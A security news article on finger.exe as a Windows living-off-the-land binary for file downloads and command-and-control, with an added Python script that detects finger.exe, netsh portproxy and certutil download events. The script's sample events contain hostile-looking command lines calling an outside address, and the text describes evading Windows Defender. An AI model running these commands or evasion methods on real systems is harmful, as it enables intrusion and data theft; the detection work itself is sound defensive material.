The list of native executables that can download or run malicious code in Windows 10 continues to expand as another one has recently been discovered!
These are referred to as living-off-the-land binaries (LoLBins) and can help attackers circumvent security controls without triggering a system security warning.
The new addition is finger.exe, a command that ships with Windows to retrieve information about users on remote computers running the Finger service or daemon. The connection uses the Name/Finger network communication protocol.
Security researcher John Page discovered that the Microsoft Windows TCPIP Finger command can also act as a file downloader and as a makeshift command-and-control (C2) server that can be used to send commands and exfiltrate data.
The C2 commands can be disguised as finger queries that fetch files and exfiltrate data, according to the researcher, without Windows Defender detecting the abnormal behavior.
One obstacle is that port 79, the port used by the Finger protocol, is often blocked within an organisation, Page said in a blog post published Friday.
A sufficiently privileged attacker, however, can circumvent the restriction by using Windows NetSh Portproxy, which serves as a port redirector for the TCP protocol.
This method allows HTTP(S) traffic to get past firewall rules and reach servers over unrestricted ports: Portproxy queries are sent to the IP address of the local machine and then forwarded to the C2 host specified in the redirection rule.
There are also drawbacks to downloading files with finger.exe, but nothing that can't be overcome: encoding them with Base64 is enough to escape detection.
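The behaviour described above (finger.exe reaching out to a remote host, a netsh portproxy rule redirecting traffic, and the certutil download the article compares it with) leaves process-creation events a defender can match on. The following is an added example, not code from the article or from the researcher: it parses constructed Sysmon-style process-creation lines and flags the three patterns. The field names and sample values are assumptions for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields,
# flattened to one line each). These are not taken from the article.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\finger.exe CommandLine="finger user@203.0.113.10" ParentImage=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\netsh.exe CommandLine="netsh interface portproxy add v4tov4 listenport=79 connectport=443 connectaddress=203.0.113.10" ParentImage=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -urlcache -f http://203.0.113.10/x.txt x.txt" ParentImage=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad report.txt" ParentImage=C:\\Windows\\explorer.exe',
]


def parse_event(line):
    """Split a flattened key=value event line into a dict; quoted values keep spaces."""
    pairs = re.findall(r'(\w+)=("[^"]*"|\S+)', line)
    return {key: value.strip('"') for key, value in pairs}


def _image_is(ev, name):
    return ev.get("Image", "").lower().endswith("\\" + name)


# Each rule: (description, predicate over the parsed event).
RULES = [
    ("finger.exe executed (possible LoLBin download or C2 over port 79)",
     lambda ev: _image_is(ev, "finger.exe")),
    ("netsh portproxy rule added (possible redirection around a port-79 block)",
     lambda ev: _image_is(ev, "netsh.exe")
     and "portproxy" in ev.get("CommandLine", "").lower()
     and " add " in ev.get("CommandLine", "").lower()),
    ("certutil used to fetch a URL (known LoLBin download pattern)",
     lambda ev: _image_is(ev, "certutil.exe")
     and "-urlcache" in ev.get("CommandLine", "").lower()),
]


def detect(lines):
    """Return (rule description, command line) for every event a rule matches."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for description, predicate in RULES:
            if predicate(ev):
                hits.append((description, ev.get("CommandLine", "")))
    return hits


if __name__ == "__main__":
    for description, cmdline in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {description}: {cmdline}")
```

Legitimate use of finger.exe is rare on modern Windows hosts, so alerting on any execution is a reasonable baseline; the portproxy rule should be tuned against known administrative change windows.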
The researcher created proof-of-concept (PoC) scripts – DarkFinger.py for the C2 and the client-side DarkFinger-Agent.bat – and released them publicly to demonstrate finger.exe's dual functionality.
In a video showing how the scripts work, Page compared his newly discovered method to certutil.exe, another LoLBin in Windows abused for malicious purposes.
Windows Defender stopped the certutil activity and logged the event, while the DarkFinger script completed the action uninterrupted on a Windows 10 machine.
Source: BleepingComputer